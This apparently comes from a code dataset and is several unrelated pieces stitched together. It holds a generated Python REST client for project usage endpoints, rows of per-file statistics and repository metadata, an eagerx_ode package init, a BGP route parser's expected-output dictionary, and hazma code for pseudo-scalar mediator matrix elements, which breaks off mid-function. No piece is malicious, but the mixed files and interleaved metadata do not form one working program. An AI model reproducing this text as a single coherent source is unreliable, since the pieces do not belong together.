    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_paas_service_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_paas_service_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/projects/usage/paas_services', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PaasServicesUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def project_level_rocket_storage_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level rocket storage usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_rocket_storage_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: RocketStoragesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request the deserialized payload only. With async_req=True the
    # delegate returns the request thread, otherwise the response data, so a
    # single return covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.project_level_rocket_storage_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_rocket_storage_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level rocket storage usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_rocket_storage_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: RocketStoragesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may pass: endpoint parameters plus the
    # transport-level plumbing flags.
    allowed = {
        'from_time', 'to_time', 'without_deleted', 'interval_variable',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    }
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_rocket_storage_usage_get" % name
            )

    params = dict(kwargs)
    params['from_time'] = from_time
    # 'from_time' is required and must carry a value.
    if params['from_time'] is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_rocket_storage_usage_get`")  # noqa: E501

    # Only keywords the caller actually supplied become query parameters.
    query_params = [
        (name, params[name])
        for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/projects/usage/rocket_storages', 'GET',
        {},  # no path parameters on this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='RocketStoragesUsages',  # noqa: E501
        auth_settings=['API_Token', 'User_UUID'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def project_level_server_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level Server usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_server_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: ServersUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request the deserialized payload only. With async_req=True the
    # delegate returns the request thread, otherwise the response data, so a
    # single return covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.project_level_server_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_server_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level Server usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_server_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: ServersUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may pass: endpoint parameters plus the
    # transport-level plumbing flags.
    allowed = {
        'from_time', 'to_time', 'without_deleted', 'interval_variable',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    }
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_server_usage_get" % name
            )

    params = dict(kwargs)
    params['from_time'] = from_time
    # 'from_time' is required and must carry a value.
    if params['from_time'] is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_server_usage_get`")  # noqa: E501

    # Only keywords the caller actually supplied become query parameters.
    query_params = [
        (name, params[name])
        for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/projects/usage/servers', 'GET',
        {},  # no path parameters on this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ServersUsages',  # noqa: E501
        auth_settings=['API_Token', 'User_UUID'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def project_level_snapshot_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level snapshot usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_snapshot_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: SnapshotsUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request the deserialized payload only. With async_req=True the
    # delegate returns the request thread, otherwise the response data, so a
    # single return covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.project_level_snapshot_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_snapshot_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level snapshot usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_snapshot_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: SnapshotsUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may pass: endpoint parameters plus the
    # transport-level plumbing flags.
    allowed = {
        'from_time', 'to_time', 'without_deleted', 'interval_variable',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    }
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_snapshot_usage_get" % name
            )

    params = dict(kwargs)
    params['from_time'] = from_time
    # 'from_time' is required and must carry a value.
    if params['from_time'] is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_snapshot_usage_get`")  # noqa: E501

    # Only keywords the caller actually supplied become query parameters.
    query_params = [
        (name, params[name])
        for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/projects/usage/snapshots', 'GET',
        {},  # no path parameters on this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='SnapshotsUsages',  # noqa: E501
        auth_settings=['API_Token', 'User_UUID'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def project_level_storage_backup_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level storage backup usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_storage_backup_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: StorageBackupUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request the deserialized payload only. With async_req=True the
    # delegate returns the request thread, otherwise the response data, so a
    # single return covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.project_level_storage_backup_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_storage_backup_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level storage backup usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_storage_backup_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: StorageBackupUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may pass: endpoint parameters plus the
    # transport-level plumbing flags.
    allowed = {
        'from_time', 'to_time', 'without_deleted', 'interval_variable',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    }
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_storage_backup_usage_get" % name
            )

    params = dict(kwargs)
    params['from_time'] = from_time
    # 'from_time' is required and must carry a value.
    if params['from_time'] is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_storage_backup_usage_get`")  # noqa: E501

    # Only keywords the caller actually supplied become query parameters.
    query_params = [
        (name, params[name])
        for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/projects/usage/storage_backups', 'GET',
        {},  # no path parameters on this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='StorageBackupUsages',  # noqa: E501
        auth_settings=['API_Token', 'User_UUID'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def project_level_template_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level templates usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_template_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: TemplatesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request the deserialized payload only. With async_req=True the
    # delegate returns the request thread, otherwise the response data, so a
    # single return covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.project_level_template_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_template_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level templates usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_template_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: TemplatesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may pass: endpoint parameters plus the
    # transport-level plumbing flags.
    allowed = {
        'from_time', 'to_time', 'without_deleted', 'interval_variable',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    }
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_template_usage_get" % name
            )

    params = dict(kwargs)
    params['from_time'] = from_time
    # 'from_time' is required and must carry a value.
    if params['from_time'] is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_template_usage_get`")  # noqa: E501

    # Only keywords the caller actually supplied become query parameters.
    query_params = [
        (name, params[name])
        for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/projects/usage/templates', 'GET',
        {},  # no path parameters on this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TemplatesUsages',  # noqa: E501
        auth_settings=['API_Token', 'User_UUID'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def project_level_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: UsageGetResponseOverview
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always request the deserialized payload only. With async_req=True the
    # delegate returns the request thread, otherwise the response data, so a
    # single return covers both cases.
    kwargs['_return_http_data_only'] = True
    return self.project_level_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: UsageGetResponseOverview
             If the method is called asynchronously,
             returns the request thread.
    """
    # Every keyword the caller may pass: endpoint parameters plus the
    # transport-level plumbing flags.
    allowed = {
        'from_time', 'to_time', 'without_deleted', 'interval_variable',
        'async_req', '_return_http_data_only', '_preload_content',
        '_request_timeout',
    }
    for name in kwargs:
        if name not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_usage_get" % name
            )

    params = dict(kwargs)
    params['from_time'] = from_time
    # 'from_time' is required and must carry a value.
    if params['from_time'] is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_usage_get`")  # noqa: E501

    # Only keywords the caller actually supplied become query parameters.
    query_params = [
        (name, params[name])
        for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable')
        if name in params
    ]

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/projects/usage', 'GET',
        {},  # no path parameters on this endpoint
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='UsageGetResponseOverview',  # noqa: E501
        auth_settings=['API_Token', 'User_UUID'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 49.165927
| 12,787
| 0.645126
| 14,917
| 121,784
| 5.020446
| 0.046591
| 0.044759
| 0.029964
| 0.021151
| 0.885045
| 0.882254
| 0.878609
| 0.876699
| 0.87475
| 0.873227
| 0
| 0.015585
| 0.267638
| 121,784
| 2,476
| 12,788
| 49.185784
| 0.824083
| 0.41131
| 0
| 0.860798
| 0
| 0
| 0.22374
| 0.055469
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03386
| false
| 0
| 0.00301
| 0
| 0.087284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4d342dc12a5d1c6bb072aaafcb237efac6cc5826
| 153
|
py
|
Python
|
eagerx_ode/__init__.py
|
eager-dev/eagerx_ode
|
2f8f2f0726816f7b794369758c626a8c16742e87
|
[
"Apache-2.0"
] | 1
|
2022-03-24T10:32:30.000Z
|
2022-03-24T10:32:30.000Z
|
eagerx_ode/__init__.py
|
eager-dev/eagerx_ode
|
2f8f2f0726816f7b794369758c626a8c16742e87
|
[
"Apache-2.0"
] | null | null | null |
eagerx_ode/__init__.py
|
eager-dev/eagerx_ode
|
2f8f2f0726816f7b794369758c626a8c16742e87
|
[
"Apache-2.0"
] | null | null | null |
__version__ = "0.1.12"
import eagerx_ode.engine # noqa: F401
import eagerx_ode.engine_nodes # noqa: F401
import eagerx_ode.engine_states # noqa: F401
| 30.6
| 45
| 0.771242
| 24
| 153
| 4.541667
| 0.5
| 0.330275
| 0.412844
| 0.577982
| 0.53211
| 0.53211
| 0
| 0
| 0
| 0
| 0
| 0.098485
| 0.137255
| 153
| 4
| 46
| 38.25
| 0.727273
| 0.20915
| 0
| 0
| 0
| 0
| 0.051282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4d60dfd090478d73216c52cb67c93755fca1c55b
| 8,772
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpBgpNeighborsAdvertisedRoutes/cli/equal/golden_output3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpBgpNeighborsAdvertisedRoutes/cli/equal/golden_output3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpBgpNeighborsAdvertisedRoutes/cli/equal/golden_output3_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
"vrf": {
"default": {
"neighbor": {
"192.168.2.65": {
"address_family": {
"ipv4 unicast": {
"advertised": {
"0.0.0.0": {
"index": {
1: {
"status_codes": "r>i",
"next_hop": "10.250.6.1",
"origin_codes": "i",
"metric": 0,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.0.0.0": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 768,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.1.100.23/32": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "i",
"metric": 0,
"localprf": 300,
"weight": 0,
"path": "65000 65000 65000 65005"
}
}
},
"10.1.138.0/24": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.2.28.11/32": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 51968,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.21.198.0/24": {
"index": {
1: {
"status_codes": "*>",
"next_hop": "192.168.198.14",
"origin_codes": "?",
"weight": 32768,
"localprf": 51712
}
}
},
"10.100.248.128/26": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.144.128/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.145.0/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.145.128/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.146.0/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
},
"10.105.146.128/25": {
"index": {
1: {
"status_codes": "*>i",
"next_hop": "10.250.6.1",
"origin_codes": "?",
"metric": 3328,
"localprf": 300,
"weight": 0,
"path": "65000"
}
}
}
},
"bgp_table_version": 1186969,
"local_router_id": "10.250.6.2"
}
}
}
}
}
}
}
| 51
| 77
| 0.141587
| 336
| 8,772
| 3.571429
| 0.190476
| 0.06
| 0.12
| 0.17
| 0.805833
| 0.805833
| 0.786667
| 0.7175
| 0.7175
| 0.7175
| 0
| 0.204728
| 0.77337
| 8,772
| 172
| 78
| 51
| 0.398893
| 0
| 0
| 0.569767
| 0
| 0
| 0.141457
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4d8d98b3d63b2f13648e3d38b392a7e9ff36ccb4
| 16,016
|
py
|
Python
|
hazma/pseudo_scalar_mediator/_pseudo_scalar_mediator_msqrd_rambo.py
|
LoganAMorrison/Hazma
|
e9612729767ff48d5ce50633393f81ee021242d2
|
[
"MIT"
] | 6
|
2019-07-30T18:14:43.000Z
|
2020-10-25T04:58:44.000Z
|
hazma/pseudo_scalar_mediator/_pseudo_scalar_mediator_msqrd_rambo.py
|
LoganAMorrison/Hazma
|
e9612729767ff48d5ce50633393f81ee021242d2
|
[
"MIT"
] | 8
|
2017-12-19T08:06:59.000Z
|
2021-04-22T02:15:26.000Z
|
hazma/pseudo_scalar_mediator/_pseudo_scalar_mediator_msqrd_rambo.py
|
LoganAMorrison/Hazma
|
e9612729767ff48d5ce50633393f81ee021242d2
|
[
"MIT"
] | 1
|
2020-04-01T11:08:49.000Z
|
2020-04-01T11:08:49.000Z
|
from hazma.field_theory_helper_functions.common_functions import minkowski_dot as MDot
from hazma.parameters import charged_pion_mass as mpi
from hazma.parameters import neutral_pion_mass as mpi0
from hazma.parameters import up_quark_mass as muq
from hazma.parameters import down_quark_mass as mdq
from hazma.parameters import b0, vh, fpi, qe
import numpy as np
class PseudoScalarMediatorMSqrdRambo:
def msqrd_xx_to_p_to_pm0(self, momenta):
"""
Returns the squared matrix element for dark matter annihilating into
two charged pions and a netural pion through a scalar mediator.
This function is used for RAMBO.
Parameters
----------
momenta : numpy.array
List of momenta of the final state particles. The first momentum is
for the positively charged pion, the second is for the negatively
charged pion and the third is for the neutral pion.
self : PseudoScalarMediatorParameters or PseudoScalarMediator object
Parameter object for the pseudo-scalar mediator theory.
Returns
-------
msqrd : float
The squared matrix element for a given set of momenta.
"""
p1 = momenta[0]
p2 = momenta[1]
p3 = momenta[2]
P = sum(momenta)
mx = self.mx
mp = self.mp
gpxx = self.gpxx
gpuu = self.gpuu
gpdd = self.gpdd
gpGG = self.gpGG
beta = self.beta
widthp = self.width_p
pxmag = np.sqrt(P[0] ** 2 / 4.0 - mx ** 2)
px = np.array([P[0] / 2.0, 0.0, 0.0, pxmag])
pxbar = np.array([P[0] / 2.0, 0.0, 0.0, -pxmag])
""" Order beta^0 """
beta0 = (
gpxx ** 2
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
** 2
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
""" Order beta^1 """
beta1 = (
2
* beta
* gpxx ** 2
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
* (
b0 * mdq * vh
+ 2 * mpi ** 2 * vh
- 2 * mpi0 ** 2 * vh
+ b0 * muq * vh
+ 4 * vh * MDot(p1, p2)
- 2 * vh * MDot(p1, p3)
- 2 * vh * MDot(p2, p3)
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
""" Order beta^2 """
beta2 = (
beta ** 2
* gpxx ** 2
* (
2
* (
2 * b0 * fpi * gpGG * mdq
- 2 * b0 * fpi * gpGG * muq
+ 2 * b0 * fpi * gpdd * vh
- 2 * b0 * fpi * gpuu * vh
)
* (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
- (
-(b0 * fpi * gpGG * mdq)
+ b0 * fpi * gpGG * muq
- b0 * fpi * gpdd * vh
+ b0 * fpi * gpuu * vh
)
** 2
+ (
b0 * mdq * vh
+ 2 * mpi ** 2 * vh
- 2 * mpi0 ** 2 * vh
+ b0 * muq * vh
+ 4 * vh * MDot(p1, p2)
- 2 * vh * MDot(p1, p3)
- 2 * vh * MDot(p2, p3)
)
** 2
)
* (mx ** 2 + MDot(px, pxbar))
) / (
9.0
* fpi ** 4
* vh ** 2
* (
(-mp ** 2 + 2 * mpi ** 2 + mpi0 ** 2) ** 2
+ mp ** 2 * widthp ** 2
- 4
* (
mp ** 2
- 2 * mpi ** 2
- mpi0 ** 2
- MDot(p1, p2)
- MDot(p1, p3)
- MDot(p2, p3)
)
* (MDot(p1, p2) + MDot(p1, p3) + MDot(p2, p3))
)
)
msqrd = beta0 + beta1 + beta2
return msqrd
    def msqrd_xx_to_p_to_pm0g(self, momenta):
        """
        Returns the squared matrix element for dark matter annihilating into
        two charged pions, a neutral pion and a photon through a pseudo-scalar
        mediator. This function is used for RAMBO.
        Parameters
        ----------
        momenta : numpy.array
            List of momenta of the final state particles. The first momentum is
            for the positively charged pion, the second is for the negatively
            charged pion, the third is for the neutral pion and the last is
            for the photon.
        self : PseudoScalarMediatorParameters or PseudoScalarMediator object
            Parameter object for the pseudo-scalar mediator theory.
        Returns
        -------
        msqrd : float
            The squared matrix element for a given set of momenta.
        """
        # Model parameters: DM mass, mediator mass, couplings, CP-mixing
